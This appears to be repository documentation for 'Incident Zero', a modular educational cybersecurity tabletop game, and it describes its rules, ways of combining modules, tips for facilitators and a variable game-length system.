Hardening | Defense-in-depth, layering, proactive security | Cost-benefit analysis, security architecture
Disaster Recovery | Crisis management, stakeholder communication | Risk assessment, incident cost
Network Building | Network design, asset security, architecture | Infrastructure hardening, threat modeling
Forensics | Digital forensics, chain of custody, attribution | Evidence handling, MITRE ATT&CK mapping
Audit & Compliance | Security assessment, governance, compliance | Risk identification, remediation prioritization

By Game Mechanic

Mechanic                      What It Teaches
d20 roll system               Uncertainty, risk, informed decision-making
Budget constraints            Resource allocation, prioritization
Justification bonuses         Technical reasoning, tools/techniques knowledge
Uncontained Threats penalty   Urgency, cost of dwell time
Pentester Tactics             Attacker sophistication, defense limitations
Playbook system               Preparation, incident response planning
Scoring systems               Outcome measurement, quality assessment

Cooperative vs. Competitive Play

Cooperative Mode

Competitive Mode

Implementation:
- Same setup for all teams
- Teams cannot share information (Incident Response)
- Score comparison determines winner (Hardening)
- Reputation comparison (Disaster Recovery)


Debrief & Reflection (Universal)

Every module should include a 5-15 minute debrief with three sections:

Part 1: What Happened?

Part 2: Why Did That Happen?

Part 3: What Would You Do Differently?


Tips for Threat Orchestrators (Universal)

Before the Game

  1. Read the module rules completely - Know what's coming
  2. Prepare your scenario - Pre-build attack chain or threat context
  3. Organize materials - Sort cards, prepare trackers
  4. Know your balancing points - Be ready to adjust difficulty if needed
  5. Practice reading clues - Deliver them dramatically!

During Gameplay

  1. Be clear about costs - Announce Budget before action
  2. Resolve rolls immediately - Announce target, let player roll, resolve
  3. Ask clarifying questions - "Why are you investigating email headers?"
  4. Be fair but challenging - Give honest difficulty, don't fudge rolls
  5. Narrate outcomes - Describe what happens, not just success/failure
  6. Manage pacing - Keep turns moving (2-3 min discussion max)
  7. Track penalties accurately - Keep budget, turn, and threat trackers visible

Balancing Difficulty

Too Easy Signs:
- Team reveals all cards/achieves goal with 40+ budget remaining
- No failed rolls
- No meaningful decisions required
- Team is bored

Too Hard Signs:
- Team is stuck/making no progress after 5 turns
- Multiple consecutive failed rolls
- Team frustrated rather than challenged
- No learning happening

Adjustment Options:
- Easier: Provide better clues, more starting budget, fewer tactics
- Harder: Less specific clues, lower budget, more tactics
- Faster: Shorter turn limits, simpler scenarios
- Slower: More turns, more complex scenarios


Card Reference

For complete card descriptions, see:
- Base Threat & Defense Cards: cards/incident-response/core-deck/threat-defense-cards.md
- Expansion Threats: cards/incident-response/expansion-deck/advanced-threats.md
- Expansion Defenses: cards/incident-response/expansion-deck/advanced-defenses.md
- All decks indexed: cards/CARD_REFERENCE.md


Module-Specific Rules

For complete rules on each module:


Quick Reference: Universal Mechanics

d20 Roll System

Budget System

Turn System

Penalties & Bonuses


Continuing to Next Steps

For your first game:
  1. Choose a module from Module Combinations
  2. Read the module-specific rules
  3. Read the standalone setup guide
  4. Prepare your scenario
  5. Play!

For multiple modules:
  1. Refer to Module Combinations for recommended sequences
  2. Refer to FRAMEWORK.md for modifier generation procedures
  3. Play the first module, then generate modifiers for the next
  4. Continue as desired


Need Help?


Incident Zero: Core Rules & Mechanics v2.1 - Balanced & Refined Edition
Universal rules for all modules

docs/FRAMEWORK.md

Incident Zero: Game Module Framework

Core Philosophy

Incident Zero is a modular, flexible educational game system. Rather than a rigid "phase" structure, we offer 6 interchangeable modules that educators can combine in any way that serves their learning objectives.


The 6 Core Modules

1. Incident Response Module

Duration: 30-45 minutes (solo), 20-35 minutes (in combination)
Focus: Attack detection, investigation, incident response
Best For: Teaching cyber kill chain, investigation methodology, budget prioritization

Standalone: Players detect a hidden attack chain through investigation and defense deployment
In Combination: Outcome (win/lose) and discovered cards modify subsequent modules


2. Hardening Module

Duration: 30-45 minutes (solo), 20-30 minutes (in combination)
Focus: Defense-in-depth, security architecture, proactive hardening
Best For: Teaching layered security, strategic planning, cost-benefit analysis

Standalone: Players build comprehensive defenses against known threat vectors
In Combination: Discovered threats (from Incident Response) guide defense strategy; OR defenses are generated via dice/cards


3. Disaster Recovery Module

Duration: 30-45 minutes (solo), 25-35 minutes (in combination)
Focus: Crisis management, forensics, stakeholder communication
Best For: Teaching incident response procedures, risk management, decision-making under pressure

Standalone: Players manage a breach crisis with budget constraints and reputation scoring
In Combination: Breach scope determined by Incident Response outcome; OR generated at setup


4. Network Building Module

Duration: 30-45 minutes (solo), 15-25 minutes (in combination)
Focus: Network architecture, asset security, foundational infrastructure
Best For: Teaching network design, critical asset identification, infrastructure hardening

Standalone: Players design and secure a network from scratch
In Combination: Network design becomes the prerequisite for all other modules; OR used as a rebuild scenario after Incident Response


5. Forensics Module (NEW in v2.1)

Duration: 30-45 minutes (solo), 25-35 minutes (in combination)
Focus: Digital forensics, evidence handling, attack attribution
Best For: Teaching chain of custody, investigation methodology, MITRE ATT&CK technique mapping

Standalone: Players investigate a compromised system, gathering evidence to build attribution, timeline, attack chain, and chain-of-custody progress
In Combination: Investigates the breach from Incident Response or Disaster Recovery; discovered evidence informs Hardening or Audit priorities


6. Audit & Compliance Module

Duration: 30-45 minutes (solo), 15-20 minutes (in combination)
Focus: Security compliance, audit procedures, governance
Best For: Teaching regulatory frameworks, security assessment, governance workflows

Standalone: Players conduct security audits and address findings
In Combination: Findings from Incident Response guide audit focus; OR used post-Hardening to validate controls


Module Combinations: Framework & Examples

Combination Philosophy

Each module can modify the next module in several ways:

  1. Outcome Modifiers: Results from one module affect setup of the next
  2. Information Modifiers: Discoveries in one module inform decisions in the next
  3. Constraint Modifiers: Limitations in one module carry forward
  4. Generated Modifiers: When modules aren't combined in sequence, modifiers are generated during setup (dice rolls, card draws, narrative decisions)

Combination Types

Solo Modules (No Dependencies)

Play any single module standalone. All modifiers are generated during setup via:
- Dice rolls (d20 for random element)
- Card draws (threat, defense, or scenario cards)
- Educator narrative choices
- Difficulty selection (Beginner/Intermediate/Advanced)

Examples:
- Incident Response solo
- Hardening solo
- Disaster Recovery solo
- Network Building solo
- Forensics solo
- Audit & Compliance solo

Linear Sequences (Recommended Paths)

Path A: Building → Defending

Network Building → Incident Response → Hardening

Path B: Crisis & Response

Incident Response (Loss) → Disaster Recovery → Audit

Path B2: Detect & Investigate

Incident Response → Forensics

Path C: Build, Test, Fix

Network Building → Audit → Hardening

Path D: Complete Lifecycle

Network Building → Hardening → Incident Response → Disaster Recovery → Forensics → Audit

Custom Combinations

Educators can mix modules any way they choose:
- "We want Incident Response, then straight to Audit"
- "Network Building + Hardening, no incident"
- "Just Disaster Recovery for crisis training"
- "Audit first, then rebuild with Hardening"

For any custom sequence:
  1. Identify the first module → play normally with generated setup
  2. For each subsequent module → during setup, generate any missing modifiers that would normally flow from prior modules

Modifier Generation (For Non-Sequential Play)

When modules aren't combined sequentially, educators create modifiers at setup using:

Scenario Deck: Pre-written scenario cards describing:
- Network layouts (if starting mid-way)
- Threat context (if starting without Incident Response)
- Compliance requirements (if starting without Audit)
- Budget constraints (if starting mid-lifecycle)

Dice Methods: Randomized setup parameters:
- Roll d20 for network security level
- Roll d20 for breach scope (for Disaster Recovery solo)
- Roll d20 for compliance findings (for Audit solo)

Educator Narrative: Direct creation based on:
- Learning objectives
- Time available
- Difficulty desired
- Real-world inspiration

Example:

Educator wants: Network Building → Disaster Recovery (no Incident Response)

Setup for Disaster Recovery:
- Educator describes network built in prior module
- Generate breach scenario via dice or narrative:
  "Roll 2d6: (3,5) = Insider threat, moderate data loss"
  "Modifiers: Budget=60, Reputation=100, Dwell time=24 hours"
- Play Disaster Recovery with those generated modifiers

Module Flexibility & Educator Choice

Why Modules Over Phases?

"Phases" implies:
- ❌ Linear progression (1→2→3)
- ❌ Specific sequence required
- ❌ All elements must be played
- ❌ Rigid pedagogical structure

"Modules" enables:
- ✅ Non-linear play
- ✅ Flexible educator choice
- ✅ Partial/complete experiences
- ✅ Adapts to learning objectives
- ✅ Combines in any sequence

Educator Decision Tree

START: What do you want to teach?

├─ "Incident response basics"
│  └─ Play: Incident Response module solo
│     (30-45 min, fast, focuses on detection)
│
├─ "Network security & architecture"
│  └─ Play: Network Building module solo
│     (30-45 min, strategic planning focus)
│
├─ "Defense-in-depth"
│  └─ Play: Hardening module solo
│     (30-45 min, layering & strategy)
│
├─ "Crisis management"
│  └─ Play: Disaster Recovery module solo
│     (30-45 min, pressure & decisions)
│
├─ "Compliance & governance"
│  └─ Play: Audit & Compliance module solo
│     (30-45 min, assessment & findings)
│
├─ "Digital forensics & attribution"
│  └─ Play: Forensics module solo
│     (30-45 min, evidence & investigation)
│
├─ "Complete incident lifecycle"
│  └─ Play: Incident Response → Disaster Recovery → Audit
│     (90-120 min, full arc, defeat scenario)
│
├─ "Defensive preparation"
│  └─ Play: Network Building → Hardening
│     (60-90 min, proactive focus)
│
├─ "Design, audit, defend"
│  └─ Play: Network Building → Audit → Hardening
│     (90-120 min, planning-focused)
│
├─ "Everything"
│  └─ Play: Network Building → Hardening → Incident Response → Disaster Recovery → Forensics → Audit
│     (4-5 hours, comprehensive, advanced)
│
└─ "Custom"
   └─ Pick any combination, generate modifiers for gaps

Module Mechanics: Consistency Across All

Common Elements (All Modules)

Every module includes:
- Setup (5 minutes): Configure difficulty, generate modifiers
- Gameplay (20-35 minutes): Core decision-making and rolls
- Scoring/Outcome (5 minutes): Determine results
- Debrief (5-15 minutes): Reflect on decisions and learning

Common Mechanics

Resource Management:
- Budget (Incident Response, Hardening, Disaster Recovery, Network Building, Forensics)
- Time/Turns (all modules)
- Reputation/Morale (Disaster Recovery, Audit)
- Progress Meters (Forensics: Attribution, Timeline, Attack Chain, Chain of Custody)

Decision Making:
- Choose action from limited options (3-5 choices)
- Roll d20 for success/failure
- Technical justification bonuses (+2, +1)
- Accept consequences or trade-offs

Modifiers & Penalties:
- Uncontained Threats (Incident Response)
- Pentester Tactics (Hardening)
- Compliance Violations (Audit)
- Network Vulnerabilities (Network Building)
- Breach Scope (Disaster Recovery)
- Anti-Forensics & Evidence Degradation (Forensics)

Debrief Questions:
- What was the decision point?
- What would you do differently?
- How does this reflect reality?
- What did you learn?


Module Compatibility Matrix

Which modules work well together?

                 IR    Hard   DR    Net    For    Audit
Incident Resp.   -     ✓✓    ✓✓    ✓      ✓✓     ✓
Hardening        ✓✓    -     ✓     ✓✓     ✓      ✓✓
Disaster Rec.    ✓✓    ✓     -     ✓      ✓✓     ✓✓
Network Build.   ✓     ✓✓    ✓     -      ✓      ✓✓
Forensics        ✓✓    ✓     ✓✓    ✓      -      ✓✓
Audit            ✓     ✓✓    ✓✓    ✓✓     ✓✓     -

Legend:
✓✓ = Highly compatible (strong modifier flow)
✓  = Compatible (weak modifier flow, mostly independent)
-  = Same module (obviously)

Example:
- Incident Response + Forensics = ✓✓ (revealed attack chain feeds the investigation)
- Network Building + Hardening = ✓✓ (complementary)
- Forensics + Audit = ✓✓ (findings drive assessment focus)

Documentation Structure

To support module flexibility:

docs/
├── FRAMEWORK.md                    # THIS FILE - Module philosophy & combinations
├── module-combinations.md          # Educator guide to combining modules
├── rules/
│   ├── core-rules.md              # Core mechanics (timeless)
│   ├── module-incident-response.md # Full IR rules
│   ├── module-hardening.md        # Full Hardening rules
│   ├── module-disaster-recovery.md# Full DR rules
│   ├── module-network-building.md # Full Network rules
│   ├── module-forensics.md        # Full Forensics rules
│   └── module-audit-compliance.md # Full Audit rules
└── standalone-games/
    ├── incident-response.md       # IR solo setup & play
    ├── hardening.md               # Hardening solo setup & play
    ├── disaster-recovery.md       # DR solo setup & play
    ├── network-building.md        # Network solo setup & play
    ├── forensics.md               # Forensics solo setup & play
    └── audit-compliance.md        # Audit solo setup & play

Version Notes

Current: v2.2 (Playtest Edition)

Modules based on:
- Incident Response v2.1 with Uncontained Threats & Pentester Tactics
- Hardening as the post-detection defensive module (typically follows an IR win)
- Disaster Recovery as the breach-crisis module (typically follows an IR loss)
- Network Building from original design (needs v2.1 refresh)
- Forensics added in v2.1 (investigation & attribution)
- Audit & Compliance from original design (needs v2.1 refresh)

Pending Refinements:
- Network Building: Update to reflect v2.1 mechanics
- Audit & Compliance: Update to reflect v2.1 mechanics
- All modules: Explicit standalone setup procedures
- Modifier generation: Formalize dice/card procedures


For Educators

Key Takeaway: You are not bound to a rigid structure. Incident Zero modules are tools in your pedagogical toolkit. Choose the modules that serve your learning objectives, sequence them in any order, and use the flexibility to adapt to your classroom needs.

Examples of Flexibility:

"I only have 45 minutes" → Play one module solo (Incident Response or Hardening)

"I want to teach the complete lifecycle" → Play all 6 modules in sequence (4-5 hours, split across sessions)

"My students need crisis management training" → Play Disaster Recovery solo

"I want to rebuild after a fictional breach" → Network Building + Hardening (no Incident Response)

"I need governance training" → Audit & Compliance solo or after Hardening


Bottom Line: Incident Zero is flexible. Your classroom needs come first. Choose the modules and combinations that work for you.

docs/module-combinations.md

Module Combinations: Quick Reference Guide for Educators

This guide provides quick reference combinations for the 6 modules and recommended time allocations.


The Six Modules (v2.1)

  1. Network Building - Design and secure infrastructure
  2. Hardening - Build defense-in-depth against known threats
  3. Incident Response - Detect and investigate hidden attacks
  4. Disaster Recovery - Manage breach crisis and recovery
  5. Forensics - Investigate compromised systems and attribute attacks
  6. Audit & Compliance - Assess security posture and control effectiveness

Quick Start: Choose Your Time & Objective

30-45 Minutes: Single Module

Pick ONE module and play it solo with generated modifiers.

Module               Focus                         Setup   Gameplay    Debrief
Network Building     Infrastructure design         5 min   25-35 min   5-10 min
Hardening            Defense-in-depth              5 min   25-35 min   5-10 min
Incident Response    Attack detection              5 min   25-35 min   5-10 min
Disaster Recovery    Crisis management             5 min   25-35 min   5-10 min
Forensics            Investigation & attribution   5 min   25-35 min   5-10 min
Audit & Compliance   Security assessment           5 min   25-35 min   5-10 min

Setup Note: Generate all modifiers (dice rolls, scenario cards) during setup phase.


60-90 Minutes: Two-Module Combinations

Path A: Building & Testing

Network Building → Incident Response
- Network designed in Module 1
- Attack tests network design in Module 2
- Modifiers Flow: Network layout informs threat scenarios
- Learning: How network design affects attack surface
- Total Time: 10 min setup + 55-70 min gameplay + 10 min debrief

Path B: Response & Recovery (Win)

Incident Response (Win) → Hardening
- Attack detected successfully
- Build defenses against known threats
- Modifiers Flow: Discovered attack vectors guide defense priorities
- Learning: How detection informs hardening strategy
- Total Time: 10 min setup + 55-70 min gameplay + 10 min debrief

Path C: Response & Recovery (Loss)

Incident Response (Loss) → Disaster Recovery
- Attack succeeds; breach occurs
- Crisis management under pressure
- Modifiers Flow: Breach scope determined by IR outcome
- Learning: Cost of detection failure; crisis response procedures
- Total Time: 10 min setup + 55-70 min gameplay + 10 min debrief

Path D: Design & Audit

Network Building → Audit & Compliance
- Network designed to meet requirements
- Audit identifies gaps and violations
- Modifiers Flow: Network design determines audit findings
- Learning: Compliance integration into design phase
- Total Time: 10 min setup + 55-70 min gameplay + 10 min debrief

Path E: Detect & Investigate (NEW with Forensics)

Incident Response (Win) → Forensics
- Attack detected successfully in IR phase
- Forensic investigation to understand and attribute the attack
- Modifiers Flow: Discovered attack chain guides forensic analysis
- Learning: How investigation reveals attacker techniques and identity
- Total Time: 10 min setup + 55-70 min gameplay + 10 min debrief

Path F: Crisis & Investigation (NEW with Forensics)

Disaster Recovery → Forensics
- Crisis response to major breach (from IR failure)
- Forensic investigation to understand scope and attribution
- Modifiers Flow: DR outcomes inform forensic investigation priorities
- Learning: How investigation informs future hardening decisions
- Total Time: 10 min setup + 55-70 min gameplay + 10 min debrief


90-120 Minutes: Three-Module Combinations

Path A: Build, Test, Fix

Network Building → Incident Response → Hardening
- Network design established
- Attack tests the network
- Hardening addresses findings
- Modifiers Flow: Design → Attack vectors → Defense priorities
- Learning: Complete security lifecycle (design → test → improve)
- Total Time: 15 min setup + 80-100 min gameplay + 10-15 min debrief

Path B: Incident & Recovery (Full Arc - Loss)

Incident Response (Loss) → Disaster Recovery → Audit
- Detection fails; breach occurs
- Crisis management and recovery
- Compliance audit of breach response
- Modifiers Flow: IR outcome → DR decisions → Audit findings
- Learning: Incident lifecycle from failure through recovery
- Total Time: 15 min setup + 80-100 min gameplay + 10-15 min debrief

Path C: Network, Hardening, Audit

Network Building → Hardening → Audit & Compliance
- Network designed
- Defenses built proactively
- Compliance validation
- Modifiers Flow: Design → Defense strategy → Audit review
- Learning: Proactive security from design through validation
- Total Time: 15 min setup + 80-100 min gameplay + 10-15 min debrief

Path D: Planning & Response

Network Building → Incident Response → Disaster Recovery
- Network architecture established
- Attack against that architecture
- Crisis management following detection failure
- Modifiers Flow: Design → Attack scenarios → Breach scope
- Learning: How design affects attack success/failure
- Total Time: 15 min setup + 80-100 min gameplay + 10-15 min debrief

Path E: Response, Crisis & Investigation (NEW with Forensics)

Incident Response (Loss) → Disaster Recovery → Forensics
- Detection fails; breach occurs
- Crisis management and response
- Forensic investigation for lessons learned
- Modifiers Flow: IR outcome → DR decisions → Forensic findings
- Learning: Complete failure response lifecycle with attribution
- Total Time: 15 min setup + 80-100 min gameplay + 10-15 min debrief

Path F: Detection, Investigation & Hardening (NEW with Forensics)

Incident Response (Win) → Forensics → Hardening
- Attack detected and contained
- Forensic investigation reveals techniques and attribution
- Hardening built specifically against the discovered attack
- Modifiers Flow: Detected threats → Forensic findings → Defense priorities
- Learning: Complete investigation-to-hardening workflow
- Total Time: 15 min setup + 80-100 min gameplay + 10-15 min debrief


2+ Hours: Four or Five Module Combinations

Path A: Complete Lifecycle (Winning Path)

Network Building → Incident Response (Win) → Hardening → Audit
- Design secure network
- Test against attack (succeed)
- Harden based on findings
- Audit final security posture
- Best For: Advanced learners, comprehensive security overview
- Total Time: 20 min setup + 140-170 min gameplay + 15 min debrief

Path B: Complete Lifecycle (Recovery Path)

Network Building → Incident Response (Loss) → Disaster Recovery → Hardening → Audit
- Design network
- Attack succeeds
- Crisis management
- Rebuild/harden after breach
- Compliance audit of recovery
- Best For: Advanced learners, crisis + recovery + compliance
- Total Time: 25 min setup + 160-190 min gameplay + 20 min debrief

Path C: Complete Lifecycle with Forensics (Investigation Focus)

Network Building → Incident Response (Loss) → Disaster Recovery → Forensics → Hardening
- Design network
- Attack detection fails
- Crisis response
- Forensic investigation and attribution
- Build hardening based on forensic findings
- Best For: Advanced learners, investigation-focused curriculum
- Total Time: 25 min setup + 165-190 min gameplay + 20 min debrief

Path D: Complete Lifecycle with Forensics (Success Focus)

Network Building → Incident Response (Win) → Forensics → Hardening → Audit
- Design network
- Attack detected and contained
- Forensic investigation reveals techniques
- Hardening against discovered threats
- Audit of final security posture
- Best For: Advanced learners, successful response workflow
- Total Time: 25 min setup + 165-190 min gameplay + 20 min debrief

Path E: All Six Modules (Complete Security Lifecycle)

Network Building → Hardening → Incident Response → Disaster Recovery → Forensics → Audit & Compliance
- Design secure network
- Build proactive defenses
- Test against attack
- Handle breach crisis (if IR fails)
- Investigate for lessons learned
- Audit overall security posture
- Best For: Research, comprehensive security curriculum, teacher training
- Total Time: 30 min setup + 210-240 min gameplay + 25 min debrief


Tournament Mode: Competitive Framework

Setup: All teams play same module(s) simultaneously

Single Module Tournament (45-60 minutes)

Multi-Module Tournament (2-2.5 hours)


Modifier Generation Procedures

When modules aren't combined sequentially, generate missing modifiers during setup:

For Hardening Module (Solo or Mid-Sequence)

Generate Attack Vectors via Scenario Card:
- Draw 4 cards from scenario deck
- Each card describes a threat vector and difficulty
- Players must defend against all 4 vectors

Or Generate via Dice:
- Roll 4d6 for each vector type
- Result determines threat sophistication (3=easy, 6=hardest)
- Adjust defense difficulty accordingly

For Disaster Recovery Module (Solo or Mid-Sequence)

Generate Breach Scope via Dice:
- Roll 2d6: [3-5] = Low (50K records), [6-8] = Medium (500K), [9-12] = High (5M+)
- Generate breach timeline: Roll 1d4 = hours before discovery (1=6h, 2=12h, 3=24h, 4=48h)
- Set ransom demand: d20 × $50K

Or Use Scenario Card:
- Educator describes breach scenario (real or fictional)
- Players respond to described incident

For Incident Response Module (Solo)

Generate Attack Chain via Threat Cards:
- Shuffle threat card deck
- Draw 3, 4, or 5 cards (by difficulty)
- Arrange in logical attack progression
- Create clues for Threat Orchestrator

Or Use Pre-Built Scenario:
- Use sample scenarios from core rules
- Customize threat vectors based on learning objectives

For Network Building Module (Solo)

Generate Requirements via Requirement Card:
- Draw cards specifying assets: "Email Server, Customer Database, Development Network"
- Draw security requirements: "MFA required, Data encryption mandatory, Audit logging"
- Players design network meeting all constraints

For Audit & Compliance Module (Solo)

Generate Audit Scope via Dice:
- Roll 1d4: [1] = Financial compliance, [2] = Data protection, [3] = Incident response, [4] = Mixed
- Roll 1d3: [1] = 3 findings needed, [2] = 5 findings, [3] = 7 findings
- Determine which findings player must identify during audit


Customization Guide: Creating Your Own Combinations

Step 1: Choose Your Learning Objective

Example: "Teach incident response AND hardening in 90 minutes"

Step 2: Select Modules That Support the Objective

Step 3: Plan Modifier Flow

Step 4: Prepare Setup Materials

Step 5: Time Allocation


Quick Compatibility Checklist

Which modules work well together?

High Compatibility (Strong modifier flow):
- ✓✓ Incident Response + Hardening
- ✓✓ Incident Response + Forensics (if IR successful)
- ✓✓ Disaster Recovery + Forensics (if IR fails)
- ✓✓ Forensics + Hardening (forensic findings guide hardening)
- ✓✓ Forensics + Audit (forensic findings inform compliance)
- ✓✓ Network Building + Hardening
- ✓✓ Network Building + Audit
- ✓✓ Disaster Recovery + Audit
- ✓✓ Incident Response + Disaster Recovery

Medium Compatibility (Weak modifier flow, mostly independent):
- ✓ Incident Response + Audit
- ✓ Hardening + Disaster Recovery
- ✓ Network Building + Disaster Recovery
- ✓ Incident Response + Network Building
- ✓ Forensics + Network Building (investigation reveals architecture needs)


Educator Tips

For Time-Constrained Sessions

For Multiple Class Sessions

For Competitive Tournaments

For Maximum Engagement


Printable Quick Reference (For Your Desk)

Single Module = 45 min session
- Setup: 5 min
- Play: 25-35 min
- Debrief: 5-10 min

Two Modules = 90 min session
- Setup: 10 min
- Play: 55-70 min
- Debrief: 10-15 min

Three Modules = 120 min session
- Setup: 15 min
- Play: 80-100 min
- Debrief: 10-15 min

Four/Five Modules = 2+ hours
- Setup: 20-25 min
- Play: 140-210 min
- Debrief: 15-25 min


Last updated: October 2025
For complete module details, see docs/FRAMEWORK.md

docs/VARIABLE_GAME_LENGTH_SYSTEM.md

Variable Game Length System (v2.1)

Version: 2.1 - Production Ready
Last Updated: October 2025
Status: Core System for All Modules


Overview

Incident Zero v2.1 introduces a Variable Game Length System that adds realism and variety without requiring complex calculations. The system has two parallel tracks:

  1. Default Formula - Simple, fast, for everyone (1 calculation, 5 seconds)
  2. Advanced Tier System - Nuanced, variable, for experienced TOs (3 steps, optional complexity)

Both produce realistic game lengths that scale with attack complexity while maintaining educational depth.


Philosophy

Why Variable Lengths?

Real-world basis:
- Some cyberattacks unfold in hours (ransomware deployments)
- Others take months (APT reconnaissance and persistence)
- Fixed 7-turn limits feel artificial

Educational value:
- Variable timelines teach "attacks aren't one-size-fits-all"
- Tight timelines create pressure; loose timelines reward caution
- Randomness mirrors real incident response unpredictability

Game design value:
- Prevents pattern recognition ("all games are exactly 7 turns")
- Encourages adaptation ("we have fewer turns, prioritize differently")
- Adds replayability ("same scenario, different timeline")


System 1: Default Formula (Beginners & Quick Play)

Formula

Turn Count = (Number of Attack Cards × 2) + 1

Quick Reference Table

Attack Chain   Calculation   Turn Count   Session Time
3 cards        (3 × 2) + 1   7 turns      ~30-40 min
4 cards        (4 × 2) + 1   9 turns      ~35-45 min
5 cards        (5 × 2) + 1   11 turns     ~40-50 min
6 cards        (6 × 2) + 1   13 turns     ~45-55 min

Why This Formula?

Usage Example

Beginner Threat Orchestrator:

"I've selected 4 threat cards for my attack chain: Phishing → Credential Theft → Lateral Movement → Ransomware. Using the formula: (4 × 2) + 1 = 9 turns. You have 9 turns to detect and contain all four threats. Timer starts now!"

Implementation Steps

  1. Design attack chain (select 3, 4, 5, or 6 threat cards)
  2. Apply formula (Cards × 2 + 1)
  3. Announce turn count (no explanation needed—it's the default)
  4. Play normally (use that turn count as hard limit)

System 2: Advanced Tier System (Experienced TOs)

Overview

The Tier + d4 system gives experienced Threat Orchestrators control over attack sophistication while maintaining randomness for realism.

Turn Count = [Tier Base Range] + d4 Modifier

Step 1: Select Attack Complexity Tier

Choose ONE tier based on attack sophistication (not visibility to players):

TIER 1: Simple & Obvious (5-7 turns base)

Attacker Profile:
- Script kiddies using publicly available tools
- Low operational security
- Little reconnaissance
- Obvious techniques

Examples:
- Basic phishing + default malware
- Publicly known exploits
- No persistence mechanisms

When to Use:
- Beginner players learning the game
- Educational scenario with clear attack progression
- Teaching specific threat technique


TIER 2: Standard Sophistication (8-10 turns base)

Attacker Profile:
- Organized cybercriminal group
- Medium operational security
- Some reconnaissance
- Mix of known and custom tools

Examples:
- Targeted phishing + credential harvesting
- Lateral movement with known exploits
- Basic persistence mechanisms
- Some anti-analysis awareness

When to Use:
- Most standard scenarios
- Realistic criminal syndicate attacks
- Default for intermediate players


TIER 3: Highly Sophisticated (11-13 turns base)

Attacker Profile:
- Advanced Persistent Threat (APT) group
- Strong operational security
- Extensive reconnaissance
- Custom tools and zero-days

Examples:
- Multi-vector attack with coordination
- Advanced persistence (firmware, kernel modules)
- Anti-forensics techniques
- Encrypted command-and-control

When to Use:
- Advanced player groups
- Teaching state-sponsored attack techniques
- Scenarios based on real APT campaigns


TIER 4: Expert / Nation-State (14-16 turns base)

Attacker Profile:
- State-sponsored cyber operations
- Extreme operational security
- Months of reconnaissance
- Military-grade tools and exploits

Examples:
- Coordinated multi-system compromise
- Supply chain attacks
- Persistent access maintained for years
- Infrastructure with plausible deniability

When to Use:
- Research and curriculum development
- Training elite response teams
- Historical incident analysis (Stuxnet, NotPetya, etc.)


Step 2: Roll for Variation (Optional)

To add unpredictability, roll 1d4 and apply modifier:

Roll     Modifier   Interpretation   Examples
1        -1 turn    Tight/Fast       "Attacker worked faster than expected; they had insider knowledge"
2 or 3   ±0 turns   No change        "Timeline proceeded as expected"
4        +1 turn    Loose/Slow       "Attacker was cautious with extended reconnaissance phase"

d4 Distribution:
- 25% chance of tight timeline (-1)
- 50% chance of baseline (±0)
- 25% chance of extended timeline (+1)

Step 3: Calculate Final Turn Count

Final Turn Count = Tier Base + d4 Result

Examples

Example 1: Standard Criminal Group (TIER 2)

Tier: TIER 2 (8-10 turns base)
Narrative: Organized ransomware group targeting healthcare
Roll: d4 = 2 (no modifier)
Final: 8-10 turns

Announcement: "This organized group has compromised your network.
You have 8-10 turns to detect and contain them."

Example 2: APT Attack (TIER 3)

Tier: TIER 3 (11-13 turns base)
Narrative: State-sponsored group conducting corporate espionage
Roll: d4 = 4 (+1 turn)
Final: 12-14 turns

Announcement: "A sophisticated actor has been operating in your network
for weeks. You have 12-14 turns to uncover the full extent of their access."

Example 3: Script Kiddie (TIER 1)

Tier: TIER 1 (5-7 turns base)
Narrative: Attacker using public PoC exploit
Roll: d4 = 1 (-1 turn)
Final: 4-6 turns

Announcement: "An attacker has hit your systems hard and fast.
You have only 4-6 turns before data starts being exfiltrated."

Critical Game Integrity Rules

These three rules ensure the system maintains educational value and prevents metagaming:


Rule 1: Accept Any Roll (Even If It Feels Wrong)

Statement: Threat Orchestrators MUST accept the d4 result as-is, regardless of whether it feels unreasonably tight or loose for the scenario.

Rationale: Real incident response is chaotic. Sometimes:
- Well-prepared attackers execute faster than expected (they had intel)
- Cautious attackers spend weeks in reconnaissance (defensive posture matters)
- Budget runs out faster than expected (incident response is expensive)

Embracing the Chaos: When a roll feels unexpected, narrate it as realism:

Implementation:
- Roll d4 publicly (so players see it wasn't rigged)
- Accept the result immediately
- Narrate it into the scenario realistically
- Move on; don't second-guess the dice

Example Conversation:

TO: "TIER 2 attack, so 8-10 turns baseline. Rolling for variation..."
[Rolls d4: 1, which means -1]
TO: "That's tight—only 7-9 turns. But that makes sense; this group
    has compromised your supplier before and knew your infrastructure.
    You have 7-9 turns."

What NOT to do:

TO: "I rolled a 1, but that feels too tight. Let me roll again."
    ✗ NO - Accept the first roll

TO: "I rolled a 1, so I'm ignoring it and using 8-10 instead."
    ✗ NO - That undermines the system

TO: "That's tight but I'll add 2 turns to make it fair."
    ✗ NO - Only Rule 3 allows modifications (and only ±1, rarely)

Rule 2: Players Cannot Question Attack Tier Based on Turn Count

Statement: Blue Team members CANNOT deduce (or ask about) the attack TIER from the announced turn count. They cannot use meta-information like "we have 9 turns, so this must be TIER 2."

Rationale:
- In reality, companies don't know attack sophistication in advance
- Attackers don't advertise their skill level
- Discovering attacker sophistication through evidence is more educational
- This prevents metagaming ("we know it's TIER 2, so let's play for 9 turns max")

What Players CAN Do:
- Ask "What suspicious activity have we detected?" → Investigates to understand threats
- Ask "Can we analyze the malware?" → Reveals sophistication through findings
- Ask "Why did this attack succeed?" → Post-game discussion (after game ends)
- Ask "How much damage was done?" → Forensic investigation (post-game)

What Players CANNOT Do:
- Ask "Is this a TIER 2 attack?" → Directly asking tier (prohibited)
- Say "This must be TIER 3 because we have 12 turns" → Meta-reasoning (prohibited)
- Assume "TIER 1 = simple, so let's focus on basics" → Meta-optimization (prevents discovery)

Implementation:

When players ask about tier/difficulty:

Player: "Is this a TIER 2 attack?"
TO: "Investigate and you'll find out. What do you want to do?"

Player: "This looks like TIER 3 based on the turn count..."
TO: "Turn count ≠ difficulty. Investigate the evidence and make your own assessment."

Player: "Can we see what we're facing?"
TO: "Some will reveal through investigation. Some will surprise you."

Rule 3: TO Modifier Authority (Rare & Optional)

Statement: ONLY after rolling d4, the Threat Orchestrator may apply an optional ±1 turn adjustment if the rolled result creates a genuinely problematic situation.

Frequency: This should be RARE (< 10% of games). Default: accept rolls.

When to Use (Genuinely Justified):

  1. Unusually Complex Setup
     - Scenario has 6+ subsystems (normal is 3-4)
     - Multiple attack vectors that need separate investigation
     - Recommend: Extend by +1 to allow full exploration

  2. New Player Group
     - First game ever; players still learning system
     - Recommend: Extend by +1 to reduce pressure on learning
